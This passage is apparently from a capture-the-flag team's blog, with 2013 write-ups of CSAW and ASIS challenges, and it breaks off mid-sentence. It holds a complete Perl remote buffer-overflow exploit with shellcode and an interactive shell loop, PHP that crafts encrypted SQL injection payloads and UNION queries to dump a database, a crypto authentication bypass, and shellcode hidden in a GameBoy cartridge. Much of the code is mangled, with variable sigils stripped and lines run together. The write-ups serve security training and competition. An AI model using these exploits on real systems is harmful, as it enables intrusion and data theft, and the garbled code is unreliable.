## Sunday, September 29, 2013

### No cON Name Facebook CTF Quals 2013 - all three levels

A 41h CTF with only 3 easy challenges? Meet No cON Name Facebook CTF Quals 2013, who's name is longer than it took to solve the tasks!

Our write-up in PDF format, for all three tasks, is available here: Dragon Sector write-ups

## Monday, September 23, 2013

### CSAW Quals 2013 - Diary (Exploitation 300)

In this task we were given 32 bit x86 Linux binary "fil_chal".
First let's check it's hardening status:

$checksec.sh --file fil_chal RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Full RELRO No canary found NX disabled No PIE No RPATH No RUNPATH fil_chal  Ok, so we have executable stack that we can use for our exploit - we only have to defeat stack randomisation. Of course we first have to find vulnerability, so let's start by loading the binary in IDA and using Hex Rays decompiler. Binary decompiled cleanly and we won't need IDA anymore. Looking through fil_chal.c file shows standard TCP daemon setup - binary listens on port 34266 and forks after accepting a connection. After connecting to the port we are greeted by username/password prompt:  ************* $        AAAAAAA  *****                   *****
*   *******  *    $ A A * * * * * * ***$ $$$A A A A * * * * * * A A___A A * * * * * * A A * * **** * * * * A AAA A * * * * * * * * *** A A A A * *** *** * * ******** *$$$    A    A   A    A     *             *
*************   $$AAAAAA AAAAAA ************* Dairy UserName: Password:  By searching for UserName string it's easy to discover under function responsible for authentication and hardcoded credentials:  v9 = (int)"csaw2013"; v15 = (int)"S1mplePWD";  Quick check of login process shows no vulnerabilities - all buffers have correct size. After logging in with our stolen credentials application asks for entry size and then reads given number of bytes from the client. Data is then written to a file which is immediately deleted after that (not really that useful as a diary ;) As one can expect the vulnerability is a buffer overflow while reading the entry. Code responsible for reading entry size:  __int16 v6; // [sp+1Ah] [bp-Eh]@1 ... if ( read(fd, &buf, 0xAu) == -1 ) { perror("read: "); result = 0; } else { v6 = atoi((const char *)&buf); if ( v6 ) { *(_WORD *)a2 = v6; result = 1; } else { send(fd, "Invalid Input or need atleast a size of 1\n", 0x2Au, 0); result = 0; } }  atoi() result is then used as an argument for read() in following code (sub_8048EFE)  ... n = a2; if ( (unsigned int)(a2 + 1) <= 0x400 ) { v7 = recv(fd, &buf, n, 0); if ( v7 == -1 ) { perror("recv: "); ...  atoi() result could be negative and mixing it with unsigned argument is always a bad idea, but author put in the check to prevent overflowing the buffer. Lucky for us the check has +1 in it - introducing the vulnerability. If we pass "-1" as a note size (a2+1) will be 0 and will pass the check, but recv() will receive -1, which will be interpreted as 0xffffffff giving us a buffer overflow. Sending -1 as entry size and 1067 bytes will overwrite saved ip. As said before stack is executable so we can upload shellcode of our choice in submitted diary entry, we only have to find out it's location in memory. We can use the send() function to leak stack memory. Let's run binary under gdb, break at last instruction of sub_8048EFE and look at the stack layout:  Breakpoint 2, 0x08049112 in ?? () (gdb) x/20xw esp 0xbffffab8: 0x41414141 0x41414141 0x00000008 0xffffffff 0xbffffac8: 0x0000000c 0x00000000 0xb7f0a249 0xb7fc6ff4 0xbffffad8: 0xbffffaf8 0xffffffff 0x00000000 0xffff0000 0xbffffae8: 0x0804967b 0x0804966e 0xb7fc6ff4 0x00000000 0xbffffaf8: 0xbffffbe8 0x08048bde 0x00000008 0xbffffbb4  There are 2 interesting two addresses in stack range - 0xbffffaf8 and 0xbffffbe8. Both point to stack areas with useful addresses, but first proved to produce different results at remote server, while second (0xbffffbe8) worked perfectly. Let's also check the address of input buffer 'buf', we'll need it later:  |0x8048f5e mov DWORD PTR [esp+0xc],0x0 |0x8048f66 mov edx,DWORD PTR [ebp-0x14] |0x8048f69 mov DWORD PTR [esp+0x8],edx |0x8048f6d lea edx,[ebp-0x41c] |0x8048f73 mov DWORD PTR [esp+0x4],edx >|0x8048f77 mov DWORD PTR [esp],eax |0x8048f7a call 0x8048890 <recv> (gdb) p/x edx 3 = 0xbffff69c  Our call to send() has to be placed before our chosen stack address, so we have to raise esp to get there - instead of searching for better gadgets I just used "RET" multiple times - there is no limit on exploit length. Here's final code use to leak the stack:  #!/usr/bin/perl use IO::Socket::INET; use warnings; use IO::Select; use bytes; | = 1; our socket = new IO::Socket::INET( PeerHost => ARGV[0], PeerPort => '34266', Reuse => 1, Proto => 'tcp', ) or die "ERROR in Socket Creation : !\n"; print socket "csaw2013\nS1mplePWD\n-1\n"; my data; socket->recv(data, 66666); print socket "A" x 1056, "\x13\x91\x04\x08" x 13, # sequence of RETs to raise esp "\x04\x8d\x04\x08", # address of send() call "\x04\x00\x00\x00", # socket fd ; socket->recv(data, 66666); print data;  This will produce following output:  ... 00002b8: 7377 6f72 643a 2057 sword: W 00002c0: 656c 636f 6d65 210a elcome!. 00002c8: 6874 7470 3a2f 2f79 http://y 00002d0: 6f75 7475 2e62 652f outu.be/ 00002d8: 4b6d 747a 5143 5368 KmtzQCSh 00002e0: 3678 6b0a 0a45 6e74 6xk..Ent 00002e8: 7279 2049 6e66 6f3a ry Info: 00002f0: 2060 e8f1 b700 0000 ...... 00002f8: 0000 0000 0000 0000 ........ 0000300: 0080 39fd b700 0000 ..9.....  Right after 'Entry info: ' prompt we have our precious stack address - 0xb7f1e860. Now all we have to do is run the same script on our local host - comparing them will give us an offset. Let's add this offset to our previosly discovered 'buf' address and we have what we need - address of our input buffer on the server. All we need now is a shellcode. I've generated it from metasploit's msfpayload (bash fd redirection is used in arguments):   msfpayload linux/x86/exec CMD="/bin/bash 1>&4 0<&4" P # linux/x86/exec - 55 bytes # http://www.metasploit.com # VERBOSE=false, PrependSetresuid=false, # PrependSetreuid=false, PrependSetuid=false, # PrependSetresgid=false, PrependSetregid=false, # PrependSetgid=false, PrependChrootBreak=false, # AppendExit=false, CMD=/bin/bash 1>&4 0<&4 my buf = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" . "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x14\x00\x00" . "\x00\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x31\x3e\x26" . "\x34\x20\x30\x3c\x26\x34\x00\x57\x53\x89\xe1\xcd\x80";  Here's a script go gain shell:  #!/usr/bin/perl use IO::Socket::INET; use warnings; use IO::Select; use bytes; | = 1; our socket = new IO::Socket::INET( PeerHost => ARGV[0], PeerPort => '34266', Reuse => 1, Proto => 'tcp', ) or die "ERROR in Socket Creation : !\n"; print socket "csaw2013\nS1mplePWD\n-1\n"; my data; socket->recv(data, 6666666); my shellcode= "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" . "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x14\x00\x00" . "\x00\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x31\x3e\x26" . "\x34\x20\x30\x3c\x26\x34\x00\x57\x53\x89\xe1\xcd\x80"; print socket "A" x 1056, "\x4a\xf6\xff\xbf", # calculated return address "\x90" x 20, # short nopsled just in case shellcode; # shellcode # interact with shell my ioset = IO::Select->new; ioset->add(\*STDIN); ioset->add(socket); my data; while(@ready = ioset->can_read) { foreach fh (@ready) { if (fh == socket){ socket->recv(data, 6666666); print data; }else{ my cmd = <STDIN>; print socket cmd; } } } socket->close();  Let's run it:  perl shell.pl 128.238.66.217 *************$$$$AAAAAAA ***** ***** * ******* *$$   $$A A * * * * * * ***$$       A  A A  A   *   *               *   *
*  *                          A  A___A  A   *   *             *   *
*  *                         A           A   *   *    ****   *   *
*  *                        A     AAA     A   *   *   *  *  *   *
*  *       ***              A    A   A    A    *   ***   ***   *
*  ********  *   $$A A A A * * *************$$    AAAAAA   AAAAAA      *************
Dairy

http://youtu.be/KmtzQCSh6xk

Entry Info:
id
uid=1001(crackme) gid=1001(crackme) groups=1001(crackme)
ls
fil_chal
key
cat key
key{signness_oh_what_a_world_we_live_in}


Success!

### CSAW CTF Quals 2013 - slurp (crypto 500)

Another CSAW write up - crypto 500! This task was solved by adam_i, fel1x and redford on behalf of Dragon Sector.

The challenge was:

“We've found the source to the Arstotzka spies rendevous server, we must find out their new vault key.” You are also provided with a slurp.py python script and the ip:port.
Trivia: Arstotzka is the place of a indie game called “Papers, Please”. The game has a very unusual gameplay. In the game you play a border control guard who is checking the the passports of persons wanting to enter Arstotzka. The game plays in a fictional Eastern Block state but the setting could also portrait modern day USA.

slurp.py is the server listening on 128.238.66.222:7788. The goal is to pass it’s authentication scheme to get the flag.
The authentication protocol is as follows:

Phase 1, sha1 challenge

Server -> Client:
base64_encoded_24bit_urandom
Client -> Server:
The client has to find a value so that the hash    $$sha1(base64\_encoded\_24bit\_urandom\ +\ client\_choosen\_chars)$$    ends with "\xFF\xFF\xFF". If the client is able to generate such a hash, the server continues to phase 2.
We solved this phase with a simple brute force of the sha1 hash. After a few seconds you can find a sha1 hash which suffices the
server-supplied challenge.

Phase 2, authentication

Remark 1:
The values sent by the client are transfer in a way that would potentially allow negative values. The formatting uses a unsigned short as packed length, concatenated with a string of the value in hexadecimal notation. However we couldn’t find any use for this during the exploitation.
Remark 2:
The random number generation used by the server is not perfect. It generates a 2048 bit number from 320 bit output of urandom, however it’s hashed in such a way that a portion of the resulting number will be contain zero bit. We couldn’t find a way to use this during the exploitation.
  def cryptrand(self,n=2048):
p1=self.hashToInt(os.urandom(40))<<1600
p1+=self.hashToInt(p1)<<1000
p1+=self.hashToInt(p1)<<500
p1+=self.hashToInt(p1)
return  (p1% self.N)

Server -> Client:
“Welcome to Arstotzka's check in server, please provide the agent number”
Client -> Server:
The client chooses the values of index and cEphemeral and send them to the server.
Index has to be at least 2, but not greater than N/2 (N is constant, known prime used as modulus in all operations).
The only restriction on cEphemeral is that cEphemeral % N != 0.
Server -> Client:
The server sends the values of sEphermeral, salt.
The client already knows salt because it’s sha512(index).
Client -> Server:
The client calculates the gennedKey and sends it to the server.
Server -> Client:
The server checks whether the server-calculated gennedKey is the same as the one provided by the client.    Then it tells the client whether authentication was successful or not.    If the authentication was successful, the server sends:
“Well done comrade, the key to the vault is $flag_value”. If you’re able to crack the authentication, you get the flag and solve the challenge. So how does the server test authentication? The client-supplied values are: index, cEphemeral The server settings are: password, 2048 bit modulus N The password is actually empty in the provided sources which let us to a dead end; more on this later. Then the server calculates: $$salt = sha512(index)$$ $$storedKey = index^{sha512(salt, password)}\ mod\ N$$ $$sEphemeralPriv = cryptrand()\ \ \#a\ 2048\ bit\ value,\ random\ in\ every\ connection$$ $$sEphemeral = index^{sEphemeralPriv} + 3 * storedKey\ mod\ N$$ $$sEphemeral = index^{sEphemeralPriv} + 3 * index^{sha512(salt + password)}\ mod\ N$$ $$\Longleftrightarrow$$ $$index^{sEphemeralPriv} = sEphemeral - 3 * index^{sha512(salt + password)}\ mod\ N$$ Note that sEphemeral and salt are now sent to the client $$slush = sha512(cEphemeral, sEphemeral)$$ $$agreedKey = sha512( (cEphemeral * storedKey^{slush})^{sEphemeralPriv}\ mod\ N )$$ $$gennedKey = sha512(sha512(N) \oplus sha512(index), sha512(index), salt, cEphemeral, sEphemeral, agreedKey)$$ The only unknown value is agreedKey. Then, the compare on the client-supplied gennedKey is done. So, the client needs to find a known agreedKey. First attempt Our first attempt was to calculate the agreedKey, which is actually possible without knowing the randomly generated sEphemeralPriv. $$agreedKey = sha512( (cEphemeral * storedKey^{slush})^{sEphemeralPriv}\ mod\ N )$$ $$agreedKey = sha512( agreedKey\_withouthash )$$ $$agreedKey\_withouthash = (cEphemeral * storedKey^{slush})^{sEphemeralPriv}\ mod\ N$$ $$agreedKey\_withouthash = (cEphemeral * index^{sha512(salt, password) * slush})^{sEphemeralPriv}\ mod\ N$$ If we choose $$cEphemeral = index^{xxx}$$ we get $$agreedKey\_withouthash = (index^{xxx} * index^{sha512(salt, password) * slush})^{sEphemeralPriv}\ mod\ N$$ $$agreedKey\_withouthash = (index^{xxx + sha512(salt, password) * slush})^{sEphemeralPriv}\ mod\ N$$ $$agreedKey\_withouthash = (index^{sEphemeralPriv})^{xxx + sha512(salt, password) * slush}\ mod\ N$$ With the following value from above: $$index^{sEphemeralPriv} = sEphemeral - 3 * index^{sha512(salt + password)}\ mod\ N$$ We get the following: $$agreedKey\_withouthash = (sEphemeral - 3 * index^{sha512(salt + password)})^{xxx + sha512(salt, password) * slush}\ mod\ N$$ So, we had a formula for calculating agreedKey and knew all variables of the formula. By calculating agreedKey we were able to calculate gennedKey and send it to the server. This all worked well for our test environment. However it did not work on the live flag server. Our guess was that the password is different on the live flag server, thus we were not able to calculate the correct agreedKey. Second attempt Our second attempt which was successful in the end, was to carefully choose the index. Let’s look again at this equation: $$agreedKey\_withouthash = (cEphemeral * index^{sha512(salt, password) * slush})^{sEphemeralPriv}\ mod\ N$$ We can set cEphemeral to 1 (the value is from the client), which simplifies the formula to: $$agreedKey\_withouthash = index^{sha512(salt, password) * slush * sEphemeralPriv}\ mod\ N$$ Because the exponential is changing for each connection on random, we can assume that it’s divisible by some small number, e.g. 3 or 4 (if not, we can retry until it is). So, let’s now find the index, such that: $$index^3 = 1\ (mod\ N)$$ (index is cubic root of 1 modulo prime N) If we manage to find such index and (sha512(salt, password) * slush * sEphemeralPriv) will be divisible by 3, agreedKey_withouthash will equals to 1. How to find it? One line in mathematica: Reduce[x^3 == 1, x, Modulus->5924486056224…(the value of N)] Result: http://wklej.org/hash/3ca3fcbd545/txt/ There are 3 solutions, but only the second one satisfies constraints on the index value. Now we have to set the index to this number, calculate agreedKey = SHA512(1) and send the data, until it succeeds ;) Remarks: Instead of 3 you could use 4 and then find the root using formula: $$a^{\frac{N-1}{4}}$$ (a can be, for example, 2). You couldn’t use 2 instead of 3, because the only quadratic roots of 1 are 1 and -1 (refused by server’s constraints). ### CSAW CTF Quals 2013 - RECON (all) Another CSAW CTF 2013 quals write up! This time by our guest player dyjakan, who has written down the solutions discovered by himself, as well as other Dragon Sector players: mak, gynvael, hasherezade, etc (half of the team went after Teddy heh). Enyoj! == Recon-1: Alexander Taylor == After initial recon, we could not find proper solution. We have spent a lot of time browsing through rather funny trolling site [http://legitass.net] where we have landed because "Randall Flagg" (@CTF_tr0ll) is following Alexander (@fuzyll). Meanwhile, following announcement was made: "An error has been fixed in the Alexander Taylor recon challenge. Please reset your reconnaissance.". We did follow their advice and within minutes we have found out that the answer is residing in Alex's profile picture on "Judges" sub-page. Let's see:$ pnginfo ataylor.png
ataylor.png...
Image Width: 604 Image Length: 401
Bitdepth (Bits/Sample): 8
Channels (Samples/Pixel): 3
Pixel depth (Pixel Depth): 24
Colour Type (Photometric Interpretation): RGB
Image filter: Single row per byte filter
Interlacing: No interlacing
Compression Scheme: Deflate method 8, 32k window
Resolution: 11811, 11811 (pixels per meter)
FillOrder: msb-to-lsb
Byte Order: Network (Big Endian)
Number of text strings: 3 of 9
These aren't the chunks you're looking for. (tEXt uncompressed):
Move along. (tEXt uncompressed):

It does look interesting. Digging further revealed XOR-ed kTxt chunk which we have beaten with our internal tool.

Key: SPECIFICATIONS SUBJECT TO CHANGE WITHOUT NOTICE

== Recon-2: Julian Cohen ==
Looking around got us to Julians wiki user page: http://en.wikipedia.org/wiki/User_talk:HockeyInJune and the following message:

Check out my new website: http://omnom.nom.co/

Testing the IP (http://23.23.196.37/) instead of using the domain revealed the flag:

Key: 1a8024a820bdc7b31b79a2d3a9ae7c02

== Recon-3: Jordan Wiens ==
Jumping into linked site [http://key.psifertex.com] shows us this: "Michael Vario sure does some suspicious signs, hope he doesn't do me". Quick googling for "Michael Vario" leads us to his blog post about PGP magic. We ignore the post, instead we check Jordan's PGP key at MIT key server [http://pgp.mit.edu]. So, it looks that we are on the right track: "pub  2048R/A827D636 2013-08-08 Jordan Wiens (CSAW folks: getting warmer) <csaw@psifertex.com>". We have examined this key and concluded that it contains embedded image. Time for some one-liner action:

$gpg --recv-keys 0x9fbebc5ea827d636 && gpg --list-options show-photos --fingerprint 0x9fbebc5ea827d636 Key: mvarioisnotmyhomeboy == Recon-4: Kevin Chung == This recon challenge, along with teddy, was the most time-consuming for us. We have spent a lot of time googling for Kevin, alas without success. However, we were not alone in our misery -- apparently other teams also suffered with us, thus organizers have released a hint ("Hint for Kevin Chung: What places can you graduate from?"). After that we have managed to find a link to the key which was residing in "Previous Winners" section of CSAW High School Cyber Forensics Challenge [https://hsf.isis.poly.edu]. Key: who_in_the_world_is_kevin_chung Bonus-1: We digg history of SITH's wiki page [http://en.wikipedia.org/wiki/Staten_Island_Technical_High_School]. Bonus-2: We digg this [http://54.243.84.85] even more. == Recon-5: historypeats == After googling for historypeats footprint, we quickly stumbled upon this github profile [https://github.com/historypeats]. Checking out public activity of this account [https://github.com/historypeats?tab=activity] quickly reveals flag [https://github.com/historypeats/putscan/commit/a31512af6e8f2ae76bce11c0bd363f899e3488d1]. Key: whatDidtheF0xSay? == Recon-6: Brandon Edwards == We have started off with "Brandon Edwards" search results from Google. We knew, a priori, that his handle is drraid, hence we have added this to our query string. With such results we quickly checked out social pages where we have found out about his relation to sophsec [http://www.sophsec.com] (via GitHub). The key was sitting in source code of main page. Key: a959962111ea3fed179eb044d5b80407 == Recon-7: Odin == Well, this one was quick. Everyone who joined #csaw IRC channel must have noticed user @snOwDIN. Lo and behold: whois snOwDIN 19:20 -!- snOwDIN [~o@ISIS-B0CFAD3E.com]19:20 -!- ircname : linkedin:chinesespies 19:20 -!- channels : @#odin @#csaw19:20 -!- server : isis.poly.edu [ISIS IRC Server] 19:20 -!- : is using a Secure Connection 19:20 -!- idle : 0 days 0 hours 1 mins 18 secs [signon: Thu Sep 19 21:04:20 2013]19:20 -!- End of WHOIS Visiting chinesespies linkedin account revealed key to us. Key: cookies_are_for_csaw == Recon-8: Theodore Reed == Major PITA for everyone. We did *a lot* of googling here. This approach was doubleplusungood, instead we should have focused on things that were right in front of our eyes. Anyway, organizers felt everyone's frustration and released yet another hint: "Hint: From "http://prosauce.org" it takes three clicks (Now it takes more because of asshole CTF players)". This looked helpful. We pulled out all teh links (internal and external) from teddy's website [http://prosauce.org] and glanced through them. Finally, we have managed to score the flag which was residing 5-clicks away: http://prosauce.org -> http://prosauce.org/projects/ -> http://www.youtube.com/watch?v=RCTRSK45bS4 -> "All comments" -> "Show". Key: shmoonconrocksglhfwithcsaw ### CSAW CTF Quals 2013 - SCP-hack (exploitation 500) This was the highest scored exploitation challenge at the CSAW CTF qualification round. At the moment of writing these words (still 4 hours of CTF left) only 5 teams have solved it out of 1375 participating, including ours (and it took us a lot of time and a number of attempts). Several people from our team worked on this task, including, among others, hasherezade, mak, fel1x, and myself (gynvael), and we have finally solved it late Saturaday night. Oh. And by the way, don't expect any actual exploitation - this turned out to be a Networking task. The task had the following description: The SCP organization (http://128.238.66.211:45000) wants you to join, accept and see if you can take advantage of their interns sloppy coding and outdated browser. The website itself (e.g. http://128.238.66.211:45000/?invite=BL9UDG4MZG6S) greeted you with the following message: Note: the GitHub link led to a python script parser_server.py, mirrored here. So the first thing to do was to access the website with our invite token (?invite=...) from the required countries (distinguished probably by IP whois information or IP ranges). This could have been done using various methods like proxies, TOR, websites and servers "pinging" given URLs, etc. In the end after several hours we had only 5/7 required flags lit, and were looking into some more hardcore methods, but to our surprise the rules were simplified to require only 5 flags lit, which we already had (kudos to teams which actually had 7/7). Once the required amount of flags were gathered, an upload form appeared: At this moment the focus in the challenge shifts to the script parser_server.py, which turned out to be only a hint anyway - this script wasn't really used in the available version; and to the following hint-text on the website: If you are invited, try using a link to your photo instead of your 'commonName' in your certificate signing request! So what you could do now, is upload a certificate request with a link to whatever in the commonName field, and that link would be visited by something that claimed to be MSIE7b: GET /whatever HTTP/1.1 Referer: http://intern-box.thescpinternational.local/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) Accept: */* Host: myIP:43432 Connection: Keep-Alive Note: we've done several tests, and determined that's probably just wget or curl pretending to be MSIE. Thinking that it was curl actually made us go to the curl FAQ website where the curl-supported protocols are listed, and we started going through them one by one, to actually figure out that only 3 worked (yes, these are the ones listed in parser_server.py too): http://, https:// and file://. Since nothing we tried with HTTP or HTTPS actually worked, we switched focus to file://, which actually is SMB over NetBIOS over TPC. We've set up a tunnel to a Windows 7 VM and observed the traffic in wireshark: The important information here is: 1. The connection is rejected, because Windows doesn't like to be called other names (like not-its IP address, first part of not-its IP address, or *SMBSERVER) 2. It's UBUNTU. This just proves it wasn't MSIE7b to begin with. We followed up by changing the name of the Windows 7 VM to helium, and pointing an A DNS record to its external IP with the name helium.whatever.domain.we.own. At that we uploaded a new certificate signing request that pointed to the same host using the new DNS record, and got this: And yes, that's the flag in the NTLMSSP_AUTH attempt - key=whereisthedirtysmellysauce. Honestly, we have not expected it to be there, but well, that's 500 points for checking :) To summarize I'll repeat myself - I think this task should be in Networking/Miscellaneous category, and not in the Exploitation one, which was pretty misleading. In the end we're just glad to have solved it. ### CSAW CTF Quals 2013 - GameMan (exploitation 400) Another CSAW CTF 2013 Quals exploitation task - this time for 400 points (there were two exp400 tasks, this one is the one added Saturday evening/night). It was solved by 26 teams (at the moment of writing these words; still 1h of CTF left), including ours, which is quite surprising since this task turned out to be really simple. On behalf of Dragon Sector it was worked on and solved by myself (gynvael) and mak. The task description task was quite brief: nc 128.238.66.223 1025 < hello_world.gbc hello_world.gbc The extension - .gbc - tells about a GameBoy Cartridge, so we expected some funky Z80 hacking. But it turned out we were wrong. When you actually execute the above command, this is the what you get: Insert Cartridge... Loaded: CSAW CTF 2013 OK OK OK Hello World! So it actually prints out Hello World. However, to our surprise, launching it in a GameBoy emulator didn't give the same results - it actually either did nothing or crashed inside the emulator. We started to analyze the Z80 code, but we weren't getting anywhere - the code just didn't make any sense. So we decided to fall back to looking at the hex editor, trying to figure out if we maybe got the CPU wrong. Take a look at the following screen shot: The part marked in black is the code at entry point, obviously responsible for writing out "Hello World". Notice anything funny about it? The "h" letter before 4-char pieces of the string? The "B8 01 00 00 00" sequence? The "CD 80" sequence? Yes ladies and gentlemen - this isn't Z80, it's x86/Linux! So what actually happens, is that the network daemon on 128.238.66.223:1025 is fetching a GBC cartridge, checking the checksums, and executing the x86 code that is placed at the entry point. And what we need to do is to put a different shellcode there (a reverse shell for example), fix the GBC checksums, and send it to the daemon. The hardest part here were the checksums. Well OK, I'm actually exaggerating - it was the easiest part, since the emulator I was using (bgb - it's pretty awesome btw) would show me proper CRC values in the debugger: So all you had to do was: 1. Paste your shellcode at 0x150. 2. Run bgb, note the correct checksums and put them in the gbc file at correct offsets. 3. Execute: nc 128.238.66.223 1025 < myexp.gbc The result? It worked pretty well :) ### CSAW CTF Quals 2013 - CryptoMatv2 (web 400_2) Another CSAW CTF quals 2013 challenge added Saturday evening (late night for Dragon Sector actually). It was worth 400 points, solved by 41 teams (still 45 minutes of CTF left, so this might be inaccurate), and involved both some crypto and web skills. On behalf of Dragon Sector this task was worked on and solved by valis, keidii, mak and myself (gynvael). Enjoy! The tasks description was interesting: Cryptomat is back! You know the drill. Get the key from Dog. http://128.238.66.225 Indeed there was a Cryptomatv1 a year ago, but being familiar with it is not required to solve this task. When entering the page you are greeted by the following message: You are not using a secure browser! (Compatible browsers expose the string SECURE in the useragent). Adding SECURE to your User Agent does the trick, and you get to see a web site for exchanging encrypted messages (see the screenshots below). In short, you can create encrypted messages and send them (e.g. to yourself), as well as search through them and download them in the encrypted form (you cannot decrypt them via www though). Let's try searching. How about we search for... query "xxx" with key "xxx" (kudos keidii for trying this out)? Ups! Looks like a MySQL error. Analyzing it you can imagine the query it's probably something like this: SELECT * FROM ??? WHERE ??? LIKE "encrypted(query,key)" ORDER BY id ASC LIMIT ?, 10 This means we have to create such a query, that when encrypted with the given key, is a valid SQL injection payload. Since, as the intro page tells us, this is AES 128-bit in CBC mode, in order to generate such a string we need to start by determining the used IV (initialization vector). It's important to note here, that in AES 128-bit CBC mode the IV is just a 128-bit string which, when encrypting, is xorred with the first 128-bit block of the plaintext, before that is encrypted (this is to prevent two messages with identical first blocks from looking the same when encrypted). Of course, when decrypting this is done in the opposite direction - first the block is decrypted, and then again is xorred with the IV. So, to determine the IV we just need to: 1. Encrypt a plaintext (e.g. "AAAAAAAAAAAAAAAA") with a key (e.g. "AAAAAAAAAAAAAAAA") via the web interface. 2. Download the encrypted message. 3. Decrypt the message using the known key and a zero IV (i.e. "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"). 4. And XOR the first block with the plaintext. What you get is the IV they use. Encrypting the given plaintext with the given key via WWW gives the following (base64-encoded) encrypted message: kdy0oag+ynCMLgeiZN0nog== Now we can use the following PHP script to get the IV: <?php$cipher = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'','cbc','');

$encrypted_msg = "kdy0oag+ynCMLgeiZN0nog==";$plaintext = "AAAAAAAAAAAAAAAA";
$key = "AAAAAAAAAAAAAAAA";$iv= "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";

mcrypt_generic_init($cipher,$key, $iv);$decrypted = mdecrypt_generic($cipher, base64_decode($encrypted_msg));
mcrypt_generic_deinit($cipher);$rec_iv = $decrypted ^$plaintext;

echo($rec_iv); The output: 8k2F2QS480W998Nm So now we have the IV! Having the IV allows us to create a string, which, after encryption with the given key and IV will result in an SQLI payload. Please note that to generate such a string you just have to start with decrypting (sic!) the payload with the key and IV, since basically encrypt(key, iv, decrypt(key, iv, payload)) == payload. This can be done with the following piece of PHP code: <?php$cipher = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'','cbc','');
$iv = "8k2F2QS480W998Nm";$key = "xxx";

$exp = "\" or 1=1 or \"\"=\""; # Padding.$l = 16 - (strlen($exp) % 16);$exp .= str_repeat(" ", $l); mcrypt_generic_init($cipher, $key,$iv);
$decrypted = mdecrypt_generic($cipher,$exp); mcrypt_generic_deinit($cipher);

print "http://128.238.66.225/search.php?key=xxx&query=" . urlencode($decrypted) . "\n"; And the output: http://128.238.66.225/search.php?key=xxx&query=%ED%EF%AC%92%F6%E5a6%F1%BAM%17%D6%94SeU%8D%EEH%F5%40%01%DD%E3%BF%F9%05%0D%92%11B Entering the link shows that the SQLI payload indeed gets executed: And here we have the aforementioned Dog! Now we just need to get the messages from him, and in order to do that we have to go through the standard way of fetching table names, column names, and their content from the INFORMATION_SCHEMA and the respective tables themselves. Here's a couple of payloads we've used to achieve that: $exp = "\" and 1=0 union select 1,2,3,4,5,TABLE_NAME,7,8 as id from INFORMATION_SCHEMA.TABLES where table_schema='cryptomat2' and \"x\"!=\""; $exp = "\" and 1=0 union select 1,2,3,4,5,COLUMN_NAME,7,8 as id from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='message' and \"x\"!=\"";$exp = "\" and 1=0 union select from_user_id,from_user_id,from_user_id,from_user_id,from_user_id,title,from_user_id,id from message where \"x\"!=\""; $exp = "\" and 1=0 union select from_user_id,from_user_id,from_user_id,from_user_id,from_user_id,hex(key),from_user_id,id from message where \"x\"!=\""; Here are the dumps from the database: From Title DL kasa information_schema kasa cryptomat2 kasa test From Title DL kasa message kasa user From Title DL kasa id kasa to_user_id kasa from_user_id kasa deleted kasa open kasa title kasa key kasa text From Title DL Dog Hey there! Dog I HAVE THE KEY Dog HERE IT IS Cat what? Cat Coolbeans kasa asdf kasa ASDF kasa a kasa a kasa fat From Title DL Dog E9F872B26C45C9996D00B435EB591D59 Dog F7524082F4E9115E7B8CBDC603873A63 Dog C14D827264B3A21442FB3AE0E6358ADAE0240DA0250455E8F1E39E487392CF8E Cat 28C34EAD73ECBF1F03A299A35400E745 Cat F41B9656DF722545F75101B48C5DECDA From Title DL Dog AB6C6EEC74AA55A53F682696559653F9F09F66D694BE4C7C0FE6D497226C0722 Dog CB87E3FDB9976BD132BFA764603A7F8930CEBBF440C9869120BE46E4B9AE01DA Dog 52F2605545A3CB2096BEFDDA90D2EF185377B5805D8A41FD9742B7A68EED0236 Cat D10992FE8494F89F962F328B88AF427F4C9B5C0F19642880C3C0CF75651AEFBD Cat A4FA063850899121803B568CD5D63EF160ECAF3782D79D44877208E108B11C59 So we have got both the encrypted messages, and the keys (which were stored on the server after all!). Here's a PHP script to decrypt them (they are hex encoded): function dec($what, $key) { global$iv;
global $cipher; mcrypt_generic_init($cipher, hex2bin($key),$iv);
$decrypted = mdecrypt_generic($cipher, hex2bin($what)); mcrypt_generic_deinit($cipher);

echo $decrypted; echo "\n"; } dec("E9F872B26C45C9996D00B435EB591D59", "AB6C6EEC74AA55A53F682696559653F9F09F66D694BE4C7C0FE6D497226C0722"); dec("F7524082F4E9115E7B8CBDC603873A63", "CB87E3FDB9976BD132BFA764603A7F8930CEBBF440C9869120BE46E4B9AE01DA"); dec("C14D827264B3A21442FB3AE0E6358ADAE0240DA0250455E8F1E39E487392CF8E", "52F2605545A3CB2096BEFDDA90D2EF185377B5805D8A41FD9742B7A68EED0236"); dec("28C34EAD73ECBF1F03A299A35400E745", "D10992FE8494F89F962F328B88AF427F4C9B5C0F19642880C3C0CF75651AEFBD"); dec("F41B9656DF722545F75101B48C5DECDA", "A4FA063850899121803B568CD5D63EF160ECAF3782D79D44877208E108B11C59"); And the output: Dog: GUESS WHAT? Dog: !!!!!!!!!!! Dog: KEY{HURR_HURR_CRYPTOC_IZ_FUN} Cat: you smell Cat: lol And that's about it. Pretty cool task :) ## Wednesday, September 11, 2013 ### ASIS CTF Finals 2013 - Inaccessible (forensics 312) A guest write-up by keidii - one of our guest players, who bravely fought with Dragon Sector against the ASIS CTF 2013 challenges! Download: ASIS CTF Finals 2013 "Inaccessible" (PDF) Inaccessible was a two-phase stegano/forensics challenge, where you started with a set of 100 GIF files. See the write-up for more details. Trivia: Something one team discovered - it seems that one of the photos promoting the CTF contained a visible name of the file and directory of an early version of this task. ## Monday, September 2, 2013 ### ASIS CTF Finals 2013 - memdump Since I never had a chance to work with volatility and Linux dumps, I've decided to take a crack at this challenge. We were given a memory dump. Looking at strings we could tell it's from a VirtualBox image running Ubuntu with a 3.5.0-23-generic kernel. strings 